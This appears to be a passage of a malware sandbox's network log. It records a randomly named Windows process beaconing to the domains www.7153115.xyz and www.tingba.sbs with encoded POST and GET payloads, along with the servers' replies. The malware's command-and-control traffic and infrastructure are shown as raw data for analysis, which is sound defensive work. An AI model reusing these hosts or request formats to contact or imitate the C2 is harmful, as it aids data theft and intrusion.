                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=512&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Ascii: d9<h1>Not Found</h1>The requested URL /u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&#x26;wFVH=-zwTKPF0iPth was not found on this server.0


                                                        Session ID: 21 | Source IP: 192.168.2.10 | Source Port: 49994 | Destination IP: 103.249.106.91 | Destination Port: 80 | PID: 6584 | Process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:49.847692013 CET | 767 | OUT | POST /dblf/ HTTP/1.1
                                                        Host: www.7153115.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.7153115.xyz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.7153115.xyz/dblf/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Ascii: eL-x=8CQG6DJoNy93M+QrFvIGbdBhT4jzRtw5VYSMj5/u1QSe9IP3F0G/BSz4GHyJ83/bmAHvdmnrHsWuEiboafU0L1/PYMRCaqlDPACUb6YxiheanG1mjp0UWGd5m5FkQ5vd3Nl2yLlQB8SpyqMW+aMVBidAatOErxxzGOrhcAkLLDDt/zkLA+j6HK7waB1L
                                                        Nov 7, 2024 15:51:50.856875896 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:50 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Ascii: d404 Not Found0


                                                        Session ID: 22 | Source IP: 192.168.2.10 | Source Port: 49995 | Destination IP: 103.249.106.91 | Destination Port: 80 | PID: 6584 | Process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:52.392051935 CET | 791 | OUT | POST /dblf/ HTTP/1.1
                                                        Host: www.7153115.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.7153115.xyz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.7153115.xyz/dblf/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Ascii: eL-x=8CQG6DJoNy93OasrHMgGKNBifYjzfNwDVYeMj47E1l6e8tL3E2u/CSz4VHzByX+2mADndkjrHt2uEn/obss3Z1/NQsRAVKlDPACUb6MXiiuak1tmsrMXbmd6h5FkU5vB3NlUyK43B5epyr8W/LMaLicLXNPUrjdjAMCbdWgUbjH/4SZMRvCtU9n+UHAhyQh3/G9VKQ7xsIO4S5sszQ==
                                                        Nov 7, 2024 15:51:53.904449940 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:53 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Ascii: d404 Not Found0
                                                        Nov 7, 2024 15:51:53.905735970 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:53 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Ascii: d404 Not Found0


                                                        Session ID: 23 | Source IP: 192.168.2.10 | Source Port: 49996 | Destination IP: 103.249.106.91 | Destination Port: 80 | PID: 6584 | Process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:54.946218967 CET | 1804 | OUT | POST /dblf/ HTTP/1.1
                                                        Host: www.7153115.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.7153115.xyz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.7153115.xyz/dblf/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:51:55.929886103 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:55 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Ascii: d404 Not Found0


                                                        Session ID: 24 | Source IP: 192.168.2.10 | Source Port: 49997 | Destination IP: 103.249.106.91 | Destination Port: 80 | PID: 6584 | Process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:57.480072021 CET | 515 | OUT | GET /dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.7153115.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:51:58.468180895 CET | 528 | IN | HTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:51:58 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Data Ascii: 148<br><br><center><p style="font-size: 20px;">......</p></center><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"JXOyCm8odVXxhB2w",ck:"JXOyCm8odVXxhB2w"})</script><meta http-equiv="refresh" content="1;url=https://www.bfyer.com?id=84562" />0


                                                        Session ID: 25 | Source IP: 192.168.2.10 | Source Port: 49998 | Destination IP: 172.67.202.10 | Destination Port: 80 | PID: 6584 | Process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:52:03.737556934 CET | 764 | OUT | POST /njro/ HTTP/1.1
                                                        Host: www.tingba.sbs
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.tingba.sbs
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.tingba.sbs/njro/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Ascii: eL-x=1ke9UaD5J32I3evJqVANovD5a6pDYVEh+nvkV3zn+U//VG3GPV4PtnLXKA8of1X92LtaxWw/qzB6wiIF2Mh3FlXdbCQL0/wXcLqEfIUfAq19+x7EWD9+qq/35cNetMbXGJiiCQKjI19H2e1SHtmVIMyx7gQf/IBU10JAqhxVCWl3gNVWdpnAp4Zpx4/G
                                                        Nov 7, 2024 15:52:04.770688057 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:52:04 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2bwu3RGVfgpHLxGPoBFZXm%2FIGgrTB2UMcvWP2SJhqdPKKiiIS138vuBZ%2FCQwVCU%2BfU1v0hditPSuJ9iEk4sOB%2BcMAZDS3pGhPgvTphh6RAIb0OoWzViv5rppS2Ao9Ez6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee251ead6e2cbe-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=764&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                        Session ID: 26 | Source IP: 192.168.2.10 | Source Port: 49999 | Destination IP: 172.67.202.10 | Destination Port: 80 | PID: 6584 | Process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:52:06.283986092 CET | 788 | OUT | POST /njro/ HTTP/1.1
                                                        Host: www.tingba.sbs
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.tingba.sbs
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.tingba.sbs/njro/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Ascii: eL-x=1ke9UaD5J32Ix93Jp24NuPD4EqpDR1El+gnkV23N+nb/WnHGIQMPqnLXBg9sSVXI2Lx4xXM/qzl6wnkF2/Z4E1XfTiRtw/wXcLqEfIQ1Aqt99BLEVnh9iK/0w8Ne6cbTGJj3CTPrIz5H2axSE5SUCMyzlQR77oIPtWRBgz4ZV34UuMoRM4GX6PFn/+KsBq9tKAD33dcLO3x+cBrg1g==
                                                        Nov 7, 2024 15:52:07.365489960 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:52:07 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tHUpsQX9x3oHguQO0T8TUJU5f3QneL2RGR5ss3rp0jVTb8MOcZAOqEjyzjJk%2FRjk2kyIH%2Bmv8SNKIumEZJOEjgNOKza3E1121%2F4RdyqeeoF2aac2QhfOUcxFeiIcwOyyNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee252e8b923596-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 54 c9 8e eb 48 76 dd 37 d0 ff 90 ce 86 51 0d 4b 99 9c 45 4a f9 5e 01 a4 38 68 16 25 51 12 a5 1d 87 20 19 22 19 24 83 c1 31 91 9f e0 7d a3 61 2f ec 85 e1 8d 97 36 ec ff e9 5e d4 5f 18 ca cc 57 55 0f dd b0 17 de 3a 36 c1 3b 9f 7b ee 0d 7e f9 1b 75 3b b5 2e a6 f6 10 91 34 f9 f1 b7 bf f9 72 bf 1f da 34 41 e5 d7 c7 88 90 7c 42 51 4d d3 3c 37 dc 73 86 43 8a 19 8f c7 54 7b f7 79 fc f1 4b 04 1c ff 1e 42 20 49 c0 8f 3c cd 53 3f fd d3 bf ff f4 8f ff fc a7 ff fc fb 3f ff db 1f fe fc 0f ff fa 85 fa 30 fd f6 37 5f 52 40 9c 87 7b be 27 50 54 b0 fe fa 38 cd 10 01 88 3c 59 5d 0e 1e 1f bc 0f e9 eb 23 01 2d a1 ee f9 5f 1e bc c8 c1 25 20 5f 2b 12 3c 49 8f 7f 35 09 06 01 06 65 f4 4b fc 0f c2 cb 43 85 93 af d4 0f 77 ff 92 74 ef d5 dd cc ef 86 3e ac 87 7e 32 f4 c9 d0 f7 87 55 32 cc 92 61 02 87 11 33 8c d8 61 c4 0d 23 7e 18 09 c3 68 34 cc 31 18 7a 99 0f 86 41 86 d3 e1 1d 8f 83 81 33 2c 41 02 3c 32 cc 72 12 e2 ac ca ef 1f 30 43 c3 00 82 c4 2f 01 19 26 20 04 c8 1f e6 43 37 c9 [TRUNCATED]
                                                        Data Ascii: a44THv7QKEJ^8h%Q "$1}a/6^_WU:6;{~u;.4r4A|BQM<7sCT{yKB I<S??07_R@{'PT8<Y]#-_% _+<I5eKCwt>~2U2a3a#~h41zA3,A<2r0C/& C72$5up~(o?G4|u3<wDY<d<%7o
                                                        Nov 7, 2024 15:52:07.365623951 CET | 212 | IN | Data Raw: 4d 7c 64 0b 9c 14 26 dd 04 a2 08 60 48 5e 7e a9 f0 bd e6 1d d5 77 aa 06 c0 30 22 df 74 df 57 fe 28 f8 0b 05 7f f7 3d f0 97 04 22 f0 14 7d 24 60 9e d9 37 e7 01 a6 e1 3b 2b 4f 69 f9 04 11 01 38 cf 12 e7 8e f2 29 cd 7c 30 71 a1 57 b9 d0 7b bb 8f f4
                                                        Data Ascii: M|d&`H^~w0"tW(="}$`7;+Oi8)|0qW{u'uro^?t&QV<t&G`$+|F7z$qL}|>| b%;>,&{7>gyK1q,u
                                                        Nov 7, 2024 15:52:07.365634918 CET | 1236 | IN | Data Raw: 86 4e 32 7c fc e9 8f ff f1 a7 ff fa 97 c7 97 4f f4 a3 d1 e8 ed d9 03 77 d6 5e df bb 70 12 18 a2 c9 87 e6 ed d9 4b 80 83 27 4e 40 00 1e 7e 08 01 6c 3f e4 d7 cf 07 34 79 7c 7e 7c f9 0e e1 cb 47 94 9b 91 e8 a5 86 25 74 61 02 49 37 89 a0 ef 03 f4 ab
                                                        Data Ascii: N2|Ow^pK'N@~l?4y|~|G%taI7-_>H7T/_,K';$yVw)A9di5&y{g_m':f~w|"Y>a$6o7?|&L~^"K}Mxqa}2#:oLjU+!N/S
                                                        Nov 7, 2024 15:52:07.366060019 CET | 1236 | IN | Data Raw: 24 ca bb 33 cc 61 b5 e6 ad 53 06 ad d5 72 a9 d5 2d a3 67 be b1 65 19 77 c0 ce 39 6f e5 b8 ba 5e 04 0a 1b cf 7d a6 52 64 4d 41 6e 34 96 57 b1 af 15 c7 9a a2 3d 28 2d 34 fa 54 e6 85 ad c9 de b2 58 0a 37 e8 ba dc c9 c6 6d 2f f6 48 40 dc 66 2b e5 23
                                                        Data Ascii: $3aSr-gew9o^}RdMAn4W=(-4TX7m/H@f+#R1X!$@9r6?cOoS,9X"9w9V`vN+TS^)vgC3wP\k7AHqDsty~xGiY9nHrD3*
                                                        Nov 7, 2024 15:52:07.366072893 CET | 1236 | IN | Data Raw: f2 b2 d0 e3 f2 b4 92 e5 bc 0f c7 16 d0 a9 0f f4 7d e4 b2 53 af 2c 19 02 6c 9a 3d 30 fc ae eb 3d 43 fa 40 b7 7b b4 3f 10 6c ee 92 94 73 1a df 91 b7 a0 d3 76 44 50 bc 64 9a 64 7d 64 47 ea d8 2e 41 d6 ef e0 fd 16 03 96 87 ce bb 82 11 67 59 ca 76 24
                                                        Data Ascii: }S,l=0=C@{?lsvDPdd}dG.AgYv$X2zks"BOT6;EAcDvD88^$'j+: qV+ pO/CJ?:/;3o}UjN>dh]n(
                                                        Nov 7, 2024 15:52:07.366951942 CET | 1236 | IN | Data Raw: 8c 4e 2e b5 11 aa c7 8e d1 b5 49 b4 e4 bf 3e 18 b9 2e 08 a2 bd 4c be 91 64 82 8d b0 61 c3 d3 ea a2 49 16 77 48 8c 7d ca ef ec 0a 1f d5 69 bb d3 57 7e 09 b3 30 67 17 51 d8 d4 4a 0b 01 ad 07 a7 77 92 51 85 85 be 77 90 c3 93 0e 97 72 82 44 af ef c8
                                                        Data Ascii: N.I>.LdaIwH}iW~0gQJwQwrDWL0+]ec3S2zzN7kTv{3#T]jaF&CI0r*\W?=-%@6a\[#e6r~[bK{w!3e7Bs]L_cG
                                                        Nov 7, 2024 15:52:07.366966009 CET | 1236 | IN | Data Raw: 15 02 cb 63 8f ed a4 ab 7b 70 5e f7 e0 dc bb fb fd 4b 47 22 22 b0 23 00 c8 28 68 a7 28 5b d6 c8 1c 68 19 8e 42 9a c8 5c 80 df 81 33 0c 45 da 25 85 db 81 43 73 7a e0 41 2e 87 8b 53 75 ad a2 15 ab 4c f2 f1 24 dc 6d 6a 78 bb 8d e0 61 3c 57 e3 aa 41
                                                        Data Ascii: c{p^KG""#(h([hB\3E%CszA.SuL$mjxa<WAf~T;M{q-|Cg33{97BCn,|J]HR0ih1*bY@t&W87Azx6Nd.3i1vH8FQ8k2q;^j,|:M,H,sD.
                                                        Nov 7, 2024 15:52:07.366976976 CET | 132 | IN | Data Raw: 3e 3a fd f0 cb d3 47 4f ce 3f ff f3 f1 b3 87 ff 7b f7 bd 3b 29 c8 db e7 4f fe 7b fa f8 ef 67 2f 3e 38 7e f6 f0 f8 c5 5f cf fe f5 cf d3 bf 7c 7b 3b f1 e6 1a 6e 0d 95 e5 5e 71 6b 24 fc e5 3f 3e 3b f9 f4 f1 d9 8b cf 4f be fe e6 fc fb 2f cf ff f6 ef
                                                        Data Ascii: >:GO?{;)O{g/>8~_|{;n^qk$?>;O/7Kus{?Rb&0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        27 | 192.168.2.10 | 50000 | 172.67.202.10 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:52:08.832688093 CET | 1801 | OUT | POST /njro/ HTTP/1.1
                                                        Host: www.tingba.sbs
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.tingba.sbs
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.tingba.sbs/njro/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 31 6b 65 39 55 61 44 35 4a 33 32 49 78 39 33 4a 70 32 34 4e 75 50 44 34 45 71 70 44 52 31 45 6c 2b 67 6e 6b 56 32 33 4e 2b 6e 54 2f 56 52 37 47 4f 33 51 50 72 6e 4c 58 43 67 39 76 53 56 58 76 32 4c 35 38 78 58 41 42 71 78 4e 36 78 46 73 46 77 4f 5a 34 4e 31 58 66 52 69 51 4b 30 2f 77 6e 63 4c 37 4e 66 49 67 31 41 71 74 39 39 44 44 45 42 6a 39 39 76 71 2f 33 35 63 4e 73 74 4d 61 32 47 50 4b 41 43 51 6a 37 55 54 5a 48 32 36 68 53 47 4b 36 55 4f 4d 79 31 6b 51 52 6a 37 6f 55 71 74 57 4d 34 67 79 4e 32 56 77 38 55 73 6f 46 35 51 70 65 66 6f 76 46 4d 30 50 32 72 50 71 70 6a 43 42 79 78 2f 64 59 54 51 56 51 42 66 51 62 75 67 65 7a 4e 59 4a 6e 6d 42 69 6d 6a 78 4e 4f 66 63 59 2f 4e 72 55 6d 76 2b 79 2b 73 67 6f 70 31 45 44 67 50 35 61 69 48 41 48 63 35 32 6c 35 65 32 55 2f 2f 44 4e 6b 51 37 61 52 4c 33 43 6d 45 33 4c 67 43 49 41 73 31 38 75 5a 4f 76 2f 41 79 54 6a 4b 4f 68 6a 56 54 6f 47 6c 65 51 74 5a 70 78 30 36 57 79 46 6f 77 41 6e 67 77 39 66 4e 33 31 45 4c 4b 7a 53 6f 41 70 30 6a 45 57 [TRUNCATED]
                                                        Data Ascii: eL-x= [TRUNCATED]
                                                        Nov 7, 2024 15:52:09.870068073 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:52:09 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wx%2B6ht8u4hyiYbYz3k9Gm3SlEEsO2%2FCDfAMBI97WHASOPFRYcQxbkiGdHcpEj%2BciGKcL7cuel%2BUEboyIuf7qqgbRoh6Hk%2FiY5QPdsg14xk7T0HobDBEStrLyR7aX%2FMZxiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee253e7e1f6b2f-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1801&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 84 53 cb 6e db 46 14 dd 07 c8 3f a8 0a 8a 04 cd 50 24 45 3d 2c d2 0e 20 4b 96 e3 58 b6 94 58 72 d2 ec 86 e4 25 39 f6 70 66 34 1c ea 41 81 9f d0 7d 51 b4 8b 76 51 74 d3 65 8b f6 7f 92 45 fe a2 20 29 c7 16 52 b4 ab 99 b9 af 73 ee b9 77 0e bf 1a 4e 06 b3 6f a7 27 b5 48 c5 f4 c5 e3 47 87 c5 59 5b c7 94 25 47 f5 48 29 61 eb fa 6a b5 6a ac ac 06 97 a1 6e f6 7a 3d 7d 5d c4 d4 5f 1c 46 80 fd 22 45 11 45 e1 45 cb 68 e9 9f 7e fe e3 d3 4f bf 7c f8 eb bb 8f bf 7f ff f1 c7 df 0e f5 ca f5 f8 d1 61 0c 0a d7 8a 7a 1a 2c 52 b2 3c aa 0f 38 53 c0 94 36 db 08 a8 d7 bc ea 75 54 57 b0 56 7a 51 df a9 79 11 96 09 a8 a3 54 05 da 41 fd 5f 8b 48 08 24 24 d1 7d fe d3 b6 53 4b 25 3d d2 9f 16 f1 89 da 94 e8 2e f7 37 c8 27 4b e4 53 e4 2b e4 fb 28 a5 88 53 44 09 8a 4c 14 35 51 64 a1 a8 85 a2 36 8a 3a 48 48 40 1e f7 01 05 5c c6 a8 e0 83 25 60 94 00 05 4f 21 2e 54 28 79 2a 8a 0b e1 0c 05 04 a8 9f 80 42 14 42 60 3e 12 c8 a5 dc bb 5d a4 5c 01 52 11 52 fe 36 c6 32 24 cc 36 1c 81 7d 9f b0 d0 [TRUNCATED]
                                                        Data Ascii: 461SnF?P$E=, KXXr%9pf4A}QvQteE )RswNo'HGY[%GH)ajjnz=}]_F"EEEh~O|az,R<8S6uTWVzQyTA_H$$}SK%=.7'KS+(SDL5Qd6:HH@\%`O!.T(y*BB`>]\RR62$6}6Y$.>H[Jm_)-!a|W[S.'aT!7UkMX(aR3
                                                        Nov 7, 2024 15:52:09.870471001 CET | 1236 | IN | Data Raw: 84 91 ba b3 ed 23 57 80 f7 12 7c b3 4f dc a1 84 81 16 55 05 cc 46 33 c7 35 12 87 a5 2a 5a 9c 68 84 29 90 82 53 5c b0 d4 62 ee 83 ed 12 2f 75 89 97 17 23 dd ba d8 bb 2d 1a 61 be fd 64 34 1a e5 f8 b3 02 1d cf 29 9a d6 7c f0 b8 2c d3 2b 25 b1 1d f1
                                                        Data Ascii: #W|OUF35*Zh)S\b/u#-ad4)|,+%%Hm){i_)ADs]yis${R%WDP=)Rn7Xf]S81FXLQ~ctjLI7<X8P Qzow7Cr%IK(Q;"
                                                        Nov 7, 2024 15:52:09.870486021 CET | 1236 | IN | Data Raw: a0 68 49 5f e4 82 2b 1b 86 a1 7d a8 93 af 9a 9e ad 72 d6 68 aa 53 34 63 4d bf d8 7b 7f 2d 04 cf 61 23 c6 82 80 6d 98 f6 24 8f 36 be e5 b9 76 af 8f 1f 11 fc 5e d9 8b 12 f1 e8 5a 45 b2 03 00 38 a0 b8 9e df db f0 7f f8 ff 00 ff 62 1a 6e 00 c9 f6 f7
                                                        Data Ascii: hI_+}rhS4cM{-a#m$6v^ZE8bn<XQ/?>9:l`%?w^aRH]<Rajs>xkpB^^tBu,'Q{lkItiDS&7*Mlaha<LO
                                                        Nov 7, 2024 15:52:09.870893002 CET | 1236 | IN | Data Raw: e1 43 d3 5a 19 6b 1c f1 e0 40 b2 1a 40 5d af dc 49 ed 32 67 67 f6 98 e9 f7 23 d1 27 b6 fe 74 cf fe 83 b3 a3 79 95 d1 ba 1d f9 f2 d1 43 a4 0e de 97 d4 d4 bb b7 bc 92 58 4e f6 76 76 d9 9a 79 d1 46 13 1a 1c b3 f6 a7 24 41 72 49 d5 e6 0d 6d 05 93 1d
                                                        Data Ascii: CZk@@]I2gg#'tyCXNvvyF$ArImZb+D)g]~)(Fe_y>qSmdn8c9'}&C(Vr]d/=ofy>Gz%7)o3`8Y_#\`~C@mIsD)\Bal
                                                        Nov 7, 2024 15:52:09.870907068 CET | 848 | IN | Data Raw: 5d 19 38 2e 00 55 7b 75 b4 0a de 86 8f b9 e7 bd 87 27 ad af 30 9b 0b 6f 01 91 13 bb ed 5f 23 be f0 e2 a7 98 37 3f 85 35 02 77 6c 2d 3f 14 22 16 07 f9 c8 f2 39 ec dc 13 82 0a 9e da 2b 81 79 a8 d3 db 78 a7 59 3c 8d 50 e0 be 8c ba af 24 3d cc c2 28
                                                        Data Ascii: ]8.U{u'0o_#7?5wl-?"9+yxY<P$=(!8$dzM,L%~o=rV5xYX9p_[5W}?uU/gVO(d:X}F[(]Lk]/xwdpM7>w~Ev_YrbQi
                                                        Nov 7, 2024 15:52:09.871692896 CET | 1236 | IN | Data Raw: 6a 1f 6b 2a 67 8f c2 a3 3f 93 3f 6c fa e4 0a 5a 9d 9f a4 6d 9a 69 26 b4 c0 f6 66 07 f5 d5 1b d1 ac e5 d7 35 94 f6 69 42 a7 ba 3f f3 28 0b f5 2e 58 76 81 49 61 dd df 19 d1 1f 72 2b 7d bb 6b bb 83 86 d2 54 64 4c 38 d4 53 91 da 6c 6a 8b 8d 5c 5d fe
                                                        Data Ascii: jk*g??lZmi&f5iB?(.XvIar+}kTdL8Slj\]]m[`s'Coyr/..g^.}Upr>h7i.-=np|brY>{6zU)\JkN(L;>!gw'=kX]LS
